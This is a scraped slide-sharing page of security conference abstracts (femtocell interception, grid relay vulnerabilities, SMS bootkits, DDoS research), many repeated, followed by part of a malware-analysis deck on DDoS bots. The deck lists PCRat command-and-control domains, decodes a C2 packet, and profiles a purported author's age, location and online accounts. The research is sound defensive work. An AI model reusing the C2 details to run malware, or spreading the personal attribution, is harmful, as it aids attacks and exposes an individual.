Adventures in Femtoland: 350 Yuan for Invaluable Funarbitrarycode
GSM networks are compromised for over five years. Starting from passive sniffing of unencrypted traffic, moving to a fully compromised A5/1 encryption and then even to your own base station, we have different tools and opportunities. A Motorola phone retails for only $5 gives you the opportunity to peep into your girlfriend's calls. RTL-SDR retails for $20 which allows you to intercept all two-factor authentication in a medium-sized office building. Lastly, USRP retails for $700 and can intercept almost everything that you can see in 2G.
But who cares about 2G? Those who are concerned switched off of 2G. AT&T is preparing to switch off all its 2G networks by the end of 2016. Even GSMA (GSM Alliance) admitted that security through obscurity is a bad idea (referring to COMP128, A5/*, GEA algorithms and other things). 3G and LTE networks have mandatory cryptographical integrity checks for all communications, mutual authentication both for mobile devices and base station. The opportunity to analyze all protocols and cryptographical primitives due to their public availability is important.
However, the main problem is that we do not have calypso phones for 3G. We do not have cheap and ready to use devices to fuzz 3G devices over the air. Or do we? What about femtocells? Perhaps telecoms are to fast to take their guard down with security considerations embedded in 3G/4G? Users can connect to femocells. and have access the Internet on high speeds, make calls, ect.. Why don't we abuse it?
Yes, there is already research that allows you to gain control over femtocell. There is also research that allows sniffing calls and messages after gaining control. But all such solutions are not scalable. You are still bound to the telecom provider. You still have to connect to a VPN - to a core network. You have to bypass location binding and so on. Perhaps there is an easier solution? Parhaps we can create UMTS-in-a-box from readily available femtocell and have them available in large quantities without telecom-branding? We already know.
We will tell the whole story from unboxing to proof-of-concept data intercept and vulnerabilities in UMTS networks with all your favorite acronyms: HNB, SeGW, HMS, RANAP, SCTP, TR-069.
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]qqlan
For two years SCADA StrangeLove speaks about Industrial Control Systems and nuclear plants. This year we want to discuss Green Energy. Our hackers' vision of Green Energy, SmartGrids and Cloud IoT technology.
We will also speak about the security problems of traditional "heavy" industrial solutions, about the things that Zurich Airport and Large Hadron Collider have in common On top of it you will learn about our new releases, some funny and not so funny stories about discovery and fixing of vulnerabilities and the latest news from the front struggling for the Purity of Essence. Our latest research was devoted to the analysis of the architecture and implementation of the most wide spread platforms for wind and solar energy generation which produce many gigawatts of it. It may seem (not) surprising but the systems which manage huge turbine towers and household PhotoVoltaic plants are not only connected to the internet but also prone to many well known vulnerabilities and low-hanging 0-days. Even if these systems cannot be found via Shodan, fancy cloud technologies leave no chances for security. We will also speak about the security problems of traditional "heavy" industrial solutions, about the things that Zurich Airport and Large Hadron Collider have in common and why one should not develop brand new web server. Specially for the specialists on the other side of the fences, we will show by example of one industry the link between information security and industrial safety and will also demonstrate how a root access gained in a few minutes can bring to nought all the years of efforts that were devoted to the improvement of fail-safety and reliability of the ICS system. On top of it you will learn about our new releases, some funny and not so funny stories about discovery and fixing of vulnerabilities and the latest news from the front struggling for the Purity of Essence.
──────────
➤Speaker: Sergey Gordeychik, Aleksandr Timorin
D1 t1 t. yunusov k. nesterov - bootkit via smsqqlan
Having developed a test set, we started to research how safe it is for clients to use 4G networks of the telecommunication companies. During the research we have tested SIM-cards, 4G USB modems, radio components, IP access network. First of all we looked for the vulnerabilities that could be exploited remotely, via IP or radio network.
And the result was not late in arriving. In some cases we managed to attack SIM-cards and install a malicious Java applet there, we were able to update remotely USB modem firmware, to change password on a selfcare portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped to understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install bootkit on a box, that this modem is connected to.
Ведущий: Терренс Гаро
В докладе рассказывается о том, как создать ханипот (ловушку) и организовать сервис с обновляемыми данными о попавшихся DDoS-ботах с помощью Kibana, Elasticsearch, Logstash и AMQP. Докладчик откроет исходный код системы мониторинга и сбора внешней статистики DDoS-атак, над которой он работал со своей командой последние два года.
Adventures in Femtoland: 350 Yuan for Invaluable Funarbitrarycode
GSM networks are compromised for over five years. Starting from passive sniffing of unencrypted traffic, moving to a fully compromised A5/1 encryption and then even to your own base station, we have different tools and opportunities. A Motorola phone retails for only $5 gives you the opportunity to peep into your girlfriend's calls. RTL-SDR retails for $20 which allows you to intercept all two-factor authentication in a medium-sized office building. Lastly, USRP retails for $700 and can intercept almost everything that you can see in 2G.
But who cares about 2G? Those who are concerned switched off of 2G. AT&T is preparing to switch off all its 2G networks by the end of 2016. Even GSMA (GSM Alliance) admitted that security through obscurity is a bad idea (referring to COMP128, A5/*, GEA algorithms and other things). 3G and LTE networks have mandatory cryptographical integrity checks for all communications, mutual authentication both for mobile devices and base station. The opportunity to analyze all protocols and cryptographical primitives due to their public availability is important.
However, the main problem is that we do not have calypso phones for 3G. We do not have cheap and ready to use devices to fuzz 3G devices over the air. Or do we? What about femtocells? Perhaps telecoms are to fast to take their guard down with security considerations embedded in 3G/4G? Users can connect to femocells. and have access the Internet on high speeds, make calls, ect.. Why don't we abuse it?
Yes, there is already research that allows you to gain control over femtocell. There is also research that allows sniffing calls and messages after gaining control. But all such solutions are not scalable. You are still bound to the telecom provider. You still have to connect to a VPN - to a core network. You have to bypass location binding and so on. Perhaps there is an easier solution? Parhaps we can create UMTS-in-a-box from readily available femtocell and have them available in large quantities without telecom-branding? We already know.
We will tell the whole story from unboxing to proof-of-concept data intercept and vulnerabilities in UMTS networks with all your favorite acronyms: HNB, SeGW, HMS, RANAP, SCTP, TR-069.
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]qqlan
For two years SCADA StrangeLove speaks about Industrial Control Systems and nuclear plants. This year we want to discuss Green Energy. Our hackers' vision of Green Energy, SmartGrids and Cloud IoT technology.
We will also speak about the security problems of traditional "heavy" industrial solutions, about the things that Zurich Airport and Large Hadron Collider have in common On top of it you will learn about our new releases, some funny and not so funny stories about discovery and fixing of vulnerabilities and the latest news from the front struggling for the Purity of Essence. Our latest research was devoted to the analysis of the architecture and implementation of the most wide spread platforms for wind and solar energy generation which produce many gigawatts of it. It may seem (not) surprising but the systems which manage huge turbine towers and household PhotoVoltaic plants are not only connected to the internet but also prone to many well known vulnerabilities and low-hanging 0-days. Even if these systems cannot be found via Shodan, fancy cloud technologies leave no chances for security. We will also speak about the security problems of traditional "heavy" industrial solutions, about the things that Zurich Airport and Large Hadron Collider have in common and why one should not develop brand new web server. Specially for the specialists on the other side of the fences, we will show by example of one industry the link between information security and industrial safety and will also demonstrate how a root access gained in a few minutes can bring to nought all the years of efforts that were devoted to the improvement of fail-safety and reliability of the ICS system. On top of it you will learn about our new releases, some funny and not so funny stories about discovery and fixing of vulnerabilities and the latest news from the front struggling for the Purity of Essence.
──────────
➤Speaker: Sergey Gordeychik, Aleksandr Timorin
D1 t1 t. yunusov k. nesterov - bootkit via smsqqlan
Having developed a test set, we started to research how safe it is for clients to use 4G networks of the telecommunication companies. During the research we have tested SIM-cards, 4G USB modems, radio components, IP access network. First of all we looked for the vulnerabilities that could be exploited remotely, via IP or radio network.
And the result was not late in arriving. In some cases we managed to attack SIM-cards and install a malicious Java applet there, we were able to update remotely USB modem firmware, to change password on a selfcare portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped to understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install bootkit on a box, that this modem is connected to.
Ведущий: Терренс Гаро
В докладе рассказывается о том, как создать ханипот (ловушку) и организовать сервис с обновляемыми данными о попавшихся DDoS-ботах с помощью Kibana, Elasticsearch, Logstash и AMQP. Докладчик откроет исходный код системы мониторинга и сбора внешней статистики DDoS-атак, над которой он работал со своей командой последние два года.
The goal of the talk is to demonstrate how technical vulnerabilities in the IT components can be used to bypass industrial and functional safety features and create cable melting or blackout conditions. Few (fixed) vulnerabilities in Relay Protection terminals discovered by the SCADA StrangeLove team will be discussed.
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]RootedCON
En los últimos años, el término "side-channel" a pasado de ser un concepto únicamente conocido en el sector de hardware hacking a ser un término popular dentro de la industria debido a las vulnerabilidades que se han ido publicando. CRIME, BREACH o FIESTA son claros ejemplos de vulnerabilidades que explotan un side-channel en TLS. Más recientemente, también hemos visto vulnerabilidades empleando este mismo concepto en procesadores, como Spectre o Meltdown.
En esta charla, repasaremos el concepto de "side-channel" y haremos un repaso por las diferentes vulnerabilidades que se han ido publicando a lo largo de estos últimos años, explicando en que consisten y que limitaciones tienen.
Recon: Hopeless relay protection for substation automation Sergey Gordeychik
Recon 2017: By Kirill Nesterov, Alexander Tlyapov
Digital Substation is an essential part of every electrical network. It is also a base ground for modern Smart Grid technologies. More than 4000 of IEC 61850 compatible substations operated in Europe, 20 000+ worldwide, each of the comprising communication and flow of gigawatts of electrical current between large power plants (thermoelectrical, hydroelectrical or even nuclear) and their respective consumers. Such consumers include cities, industrial objects and power plants themselves. During this talk we will focus on security analysis results of key Digital Substation component - Relay Protection Terminals. Protective relays are devices for detection of electrical faults. When such fault is detected relay device designed to trip a circuit breaker. Without them problems like over-current, over-voltage, reverse power flow, over-frequency, and under-frequency can lead to colorful and impressive pictures of giant electric arcs accompanied by bunch of sparks with total blackouts as a result.
Nowadays protective relays became digital devices with network access through which operators can access different services like self-testing, statistics, logs and others. More of it, electrical lines are also combined with fiber-optic lines for communications. Electrical part of such lines need minimal traffic, but protection against surges. So such lines can be leased to different organizations, exposing great target for attacker. All of services inside such networks are available through different industrial protocols like IEC 61850 (MMS, GOOSE), IEC104 and Modbus, a not very industrial protocols HTTP, FTP, SSH and everybody’s favorite proprietary protocols. We will show how to dig very deep inside Relay Protection Terminal and how to abuse numerous weaknesses and vulnerabilities inside.
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
The boom of AI brought to the market a set of impressive solutions both on the hardware and software side. On the other hand, massive implementation of AI in various areas brings about problems, and security is one of the greatest concerns.
In this talk we will present results of hands-on vulnerability research of different components of AI infrastructure including NVIDIA DGX GPU servers, ML frameworks such as Pytorch, Keras and Tensorflow, data processing pipelines and specific applications, including Medical Imaging and face recognition powered CCTV. Updated Internet Census toolkit based on the Grinder framework will be introduced.
BSides London 2015 - Proprietary network protocols - risky business on the wire.Jakub Kałużny
When speed and latency counts, there is no place for standard HTTP/SSL stack and a wise head comes up with a proprietary network protocol. How to deal with embedded software or thick clients using protocols with no documentation at all? Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. However, when you dive inside this traffic and reverse-engineer the communication inside, you are there. Welcome to the world full of own cryptography, revertible hash algorithms and no access control at all.
We would like to present our approach and a short guideline how to reverse engineer proprietary protocols. To demonstrate, we will show you few case-studies, which in our opinion are a quintessence of ""security by obscurity"" - the most interesting examples from real-life financial industry software, which is a particularly risky business regarding security.
CommunicAsia 2021: What is hitting my honeypots?APNIC
APNIC Senior Security Specialist Adli Wahid gives a presentation on the threats the APNIC honeynet project has observed and how these were mitigated or remediated at CommunicAsia 2021, held online from 14 to 16 July 2021.
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!EC-Council
Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
If organizations are truly working to limit Internet abuse and protect end users, we need to take a more thoughtful approach to botnet takedowns – or once again bots will veer their ugly heads.
There are three main causes of ineffective takedowns:
The organizations performing botnet takedowns do so in a haphazard manner.
The organizations do not account for secondary communication methods, such as peer-to-peer or domain generation algorithms (DGA) that may be used by the malware.
The takedowns do not result in the arrest of the malware actor.
So what does a successful botnet take down actually look like? In his presentation on Botnet SmackDowns, Brian Foster, CTO of Damballa will share with attendees how to effectively takedown botnets for good. The only way botnet takedowns will have a lasting impact on end user safety is if security researchers use a comprehensive and systematic process that renders the botnet inoperable.
The goal of the talk is to demonstrate how technical vulnerabilities in the IT components can be used to bypass industrial and functional safety features and create cable melting or blackout conditions. Few (fixed) vulnerabilities in Relay Protection terminals discovered by the SCADA StrangeLove team will be discussed.
Jose Selvi - Side-Channels Uncovered [rootedvlc2018]RootedCON
En los últimos años, el término "side-channel" a pasado de ser un concepto únicamente conocido en el sector de hardware hacking a ser un término popular dentro de la industria debido a las vulnerabilidades que se han ido publicando. CRIME, BREACH o FIESTA son claros ejemplos de vulnerabilidades que explotan un side-channel en TLS. Más recientemente, también hemos visto vulnerabilidades empleando este mismo concepto en procesadores, como Spectre o Meltdown.
En esta charla, repasaremos el concepto de "side-channel" y haremos un repaso por las diferentes vulnerabilidades que se han ido publicando a lo largo de estos últimos años, explicando en que consisten y que limitaciones tienen.
Recon: Hopeless relay protection for substation automation Sergey Gordeychik
Recon 2017: By Kirill Nesterov, Alexander Tlyapov
Digital Substation is an essential part of every electrical network. It is also a base ground for modern Smart Grid technologies. More than 4000 of IEC 61850 compatible substations operated in Europe, 20 000+ worldwide, each of the comprising communication and flow of gigawatts of electrical current between large power plants (thermoelectrical, hydroelectrical or even nuclear) and their respective consumers. Such consumers include cities, industrial objects and power plants themselves. During this talk we will focus on security analysis results of key Digital Substation component - Relay Protection Terminals. Protective relays are devices for detection of electrical faults. When such fault is detected relay device designed to trip a circuit breaker. Without them problems like over-current, over-voltage, reverse power flow, over-frequency, and under-frequency can lead to colorful and impressive pictures of giant electric arcs accompanied by bunch of sparks with total blackouts as a result.
Nowadays protective relays became digital devices with network access through which operators can access different services like self-testing, statistics, logs and others. More of it, electrical lines are also combined with fiber-optic lines for communications. Electrical part of such lines need minimal traffic, but protection against surges. So such lines can be leased to different organizations, exposing great target for attacker. All of services inside such networks are available through different industrial protocols like IEC 61850 (MMS, GOOSE), IEC104 and Modbus, a not very industrial protocols HTTP, FTP, SSH and everybody’s favorite proprietary protocols. We will show how to dig very deep inside Relay Protection Terminal and how to abuse numerous weaknesses and vulnerabilities inside.
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
The boom of AI brought to the market a set of impressive solutions both on the hardware and software side. On the other hand, massive implementation of AI in various areas brings about problems, and security is one of the greatest concerns.
In this talk we will present results of hands-on vulnerability research of different components of AI infrastructure including NVIDIA DGX GPU servers, ML frameworks such as Pytorch, Keras and Tensorflow, data processing pipelines and specific applications, including Medical Imaging and face recognition powered CCTV. Updated Internet Census toolkit based on the Grinder framework will be introduced.
BSides London 2015 - Proprietary network protocols - risky business on the wire.Jakub Kałużny
When speed and latency counts, there is no place for standard HTTP/SSL stack and a wise head comes up with a proprietary network protocol. How to deal with embedded software or thick clients using protocols with no documentation at all? Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. However, when you dive inside this traffic and reverse-engineer the communication inside, you are there. Welcome to the world full of own cryptography, revertible hash algorithms and no access control at all.
We would like to present our approach and a short guideline how to reverse engineer proprietary protocols. To demonstrate, we will show you few case-studies, which in our opinion are a quintessence of ""security by obscurity"" - the most interesting examples from real-life financial industry software, which is a particularly risky business regarding security.
CommunicAsia 2021: What is hitting my honeypots?APNIC
APNIC Senior Security Specialist Adli Wahid gives a presentation on the threats the APNIC honeynet project has observed and how these were mitigated or remediated at CommunicAsia 2021, held online from 14 to 16 July 2021.
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!EC-Council
Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
If organizations are truly working to limit Internet abuse and protect end users, we need to take a more thoughtful approach to botnet takedowns – or once again bots will veer their ugly heads.
There are three main causes of ineffective takedowns:
The organizations performing botnet takedowns do so in a haphazard manner.
The organizations do not account for secondary communication methods, such as peer-to-peer or domain generation algorithms (DGA) that may be used by the malware.
The takedowns do not result in the arrest of the malware actor.
So what does a successful botnet take down actually look like? In his presentation on Botnet SmackDowns, Brian Foster, CTO of Damballa will share with attendees how to effectively takedown botnets for good. The only way botnet takedowns will have a lasting impact on end user safety is if security researchers use a comprehensive and systematic process that renders the botnet inoperable.
-IoT Security is a Safety/Privacy Issue
-Consider the devices you bring into your home and to work
Video Links:
-Hue: https://www.youtube.com/watch?v=7TOsFqqJgj4
-Slow Cooker: https://www.walmart.com/ip/BLACK-DECKER-WiFi-Enabled-6-Quart-Slow-Cooker/128745799
-Smart Toilet: https://www.youtube.com/watch?v=HyZ7S4fE5v4
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...Andrew Morris
In this presentation, we will discuss using GreyNoise, a geographically and logically distributed system of passive Internet scan traffic collector nodes, to identify statistical anomalies in global opportunistic Internet scan traffic and correlate these anomalies with publicly disclosed vulnerabilities, large-scale DDoS attacks, and other newsworthy events. We will discuss establishing (and identifying any deviations away from) a “standard” baseline of Internet scan traffic. We will discuss successes and failures of different methods employed over the past six months. We will explore open questions and future work on automated anomaly detection of Internet scan traffic. Finally, we will provide raw data and a challenge as an exercise to the attendees.
How Networking works with Data Science HungWei Chiu
Introduce the basic concept of networking model, including the OSI model and TCP/IP model.
Also introduce basic ideas/function in networking, such as routing, classification, security..etc
Layer 8 and Why People are the Most Important Security ToolDamon Small
People are the cause of many security problems, but people are also the most effective resource for combating them. Technology is critical, but without trained professionals, it is ineffective. In the context two case studies, the presenter will describe specific instances where human creativity and skill overcame technical deficiencies. The presenter believes this topic to be particularly relevant for the Packet Hacking Village, as many techniques used are the same that are pertinent for Capture the Packet and Packet Detective.
Technical details will include the specific tools used, screenshots of captured data, and analysis of the malware and the malicious user’s activity. The goal of the presentation is show the importance of technical ability and critical thinking, and to demonstrate that skilled people are the most important tool in an information security program.
As presented at Hackfest 2015 Quebec City, November 7th 2015.
This session will focus on real world deployments of DDoS mitigation strategies in every layer of the network. It will give an overview of methods to prevent these attacks and best practices on how to provide protection in complex cloud platforms. The session will also outline what we have found in our experience managing and running thousands of Linux and Unix managed service platforms and what specifically can be done to offer protection at every layer. The session will offer insight and examples from both a business and technical perspective.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIVladimir Iglovikov, Ph.D.
Presented by Vladimir Iglovikov:
- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofsAlex Pruden
This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
3. 3
Agenda
• Who we are
• How and why
• DDoS Malwares
– PCRat
– DarkDDoser
– Cyclone
– Athena
– SATBot
– Cynic
• Trends and Takeaways
4. 4
Who we are
• Dennis Schwarz
– Security Research Analyst on Arbor Networks’ ASERT
– <3 IDA Pro
– Formerly an intrusion analyst with Dell SecureWorks
• Jason Jones
– Security Research Analyst on Arbor Networks’ ASERT
– Previously of TippingPoint DVLabs
– Research interests
• IP reputation
• Malware clustering
• Data mining
5. 5
ASERT Malware Corral
• Arbor Security Engineering & Response Team
• ASERT Malware Corral
– Malware storage + processing system
– Processing occurs via sandbox, static methods
– Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples /
day
• 567 Unique family names tagged last year
– Includes DDoS, RATs, Bankers, Infostealers,
Targeted Threats, etc.
6. 6
Why these malwares?
• Since someone took the time to code them, it’s
only fair that we analyze them – quid pro quo
• DDoS related
• Less well known
• Our automated heuristics bubbled these up to
the human analysis pile
• Special to us because we reversed them
8. 8
PCRat – “The APT”
• Made in China
• C++
• Source code uploaded to Google code in March
2011
– http://code.google.com/p/lszpal/
• Source code is based on Gh0st RAT
9. 9
PCRat – Stats
• 117 unique executables
• First seen: September 14, 2012
• Last seen: February 21, 2013
• Connections, 15 unique destinations (resolved March 14, 2013)
– 75384217.3322.org (221.130.179.36 | ASN 24400 | CHINA MOBILE COMMUNICATIONS CORPORATION –
SHANGHAI)
– www.91zhsq.com (118.244.170.139 | ASN 4808 | BEIJING HSOFT TECHNOLOGIES INC)
– sobor.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– yunddos.3322.org (125.77.199.30 | ASN 4134 | CHINANET FUJIAN PROVINCE NETWORK)
– waitingfor5.gicp.net (65.19.141.203 | ASN 6939 | HURRICANE ELECTRIC INC.)
– rq778899.vicp.net (65.19.157.205 | ASN 6939 | HURRICANE ELECTRIC INC.)
– q2y.3322.org (125.77.199.30 | ASN 4134 | CHINANET FUJIAN PROVINCE NETWORK)
– cygj.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– vipyg.3322.org (124.232.153.217 | ASN 4134 | CHINANET HUNAN PROVINCE NETWORK)
– 61.147.103.139 (ASN 23650 | CHINANET JIANGSU PROVINCE NETWORK)
– qingkuan.gicp.net (98.126.43.3 | ASN 35908 | KRYPT TECHNOLOGIES)
– Lujian111.3322.org (222.73.163.70 | ASN 4812 | CHINANET SHANGHAI PROVINCE NETWORK)
– sobor.vicp.cc (61.147.121.97 | ASN 23650 | CHINANET JIANGSU PROVINCE NETWORK)
– a944521213.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– wjydog.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
10. 10
PCRat – Loose Attribution
• lszpal@qq.com uploaded source code
• QQ number 449674599 from source
– Google: Lsz, StarW.lsz, lszhack, Lsztony00, unpack.cn
profile, lszhack.3322.org, support@lszpal.cn
• Unpack.cn forum profile
– http://www.unpack.cn/space-username-lszpal.html
– Birthday: October 10, 1990
– Active: January 8, 2009 – March 13, 2013 (present)
– Baidu profile
12. PCRat – Loose Attribution cont.
• Baidu profile
– http://hi.baidu.com/lszhk
– Male
– 22 years old
– Lives in Shunqing District (administrative center)
of Nanchong in Sichuan province
15. PCRat – Loose Attribution cont.
• 3322.org domains (resolved March 19, 2013)
– lszpal.3322.org (115.238.252.7 | ASN 4134 |
CHINANET-ZJ LISHUI NODE NETWORK)
– lsz.3322.org (59.64.158.18 | ASN 4538 | BEIJING
UNIVERSITY OF POSTS & TELCOMMUCATIONS)
– starw.lsz.3322.org is an alias for lsz.3322.org.
– lszhack.3322.org (221.207.59.118 | ASN 4837 | CHINA
UNICOM QINGHAI PROVINCE NETWORK)
16. Aside: 221.207.59.118 Domains and Malware
16
• Further
research
on
the
IP
is
le9
as
an
exercise
for
the
listener
• Thanks
to
Mike
Barr
of
Arbor
Networks
for
the
Maltego
graph
17. PCRat – Command and Control
00000000 5d 00 00 00 53 00 00 00 50 43 52 61 74 78 9c 93 ]...S... PCRatx..!
00000010 f4 71 f4 73 b7 32 34 30 36 ae 09 cf cc 53 88 08 .q.s.240 6....S..!
00000020 50 08 0e 30 aa 31 32 35 53 f0 75 aa f1 cc 2b 49 P..0.125 S.u...+I!
00000030 cd d1 08 d2 54 88 48 cd cf 03 d1 ce 01 a1 0a 08 ....T.H. ........!
00000040 e0 6a 6a 66 64 a0 a0 e0 a0 60 a4 67 62 e0 ee 51 .jjfd... .`.gb..Q!
00000050 55 63 64 60 68 c4 c0 00 00 8f e3 14 0c Ucd`h... .....!
!
• 93 byte C struct, mostly obfuscated with zlib compression
• Bytes 0-3: total length, in bytes (0x5d)
• Bytes 4-7: length of zlib chunk, in bytes (0x53)
• Bytes 8-12: tag (PCRat)
• Bytes 13-: zlib chunk
!
17
18. PCRat – Command and Control cont.
>>> data = "x5dx00x00x00x53x00x00x00x50x43x52x61x74x78x9c
x93xf4x71xf4x73xb7x32x34x30x36xaex09xcfxcc
x53x88x08x50x08x0ex30xaax31x32x35x53xf0x75xaaxf1xccx2b
x49xcdxd1x08xd2x54x88x48xcdxcfx03xd1xcex01xa1x0ax08xe0x6a
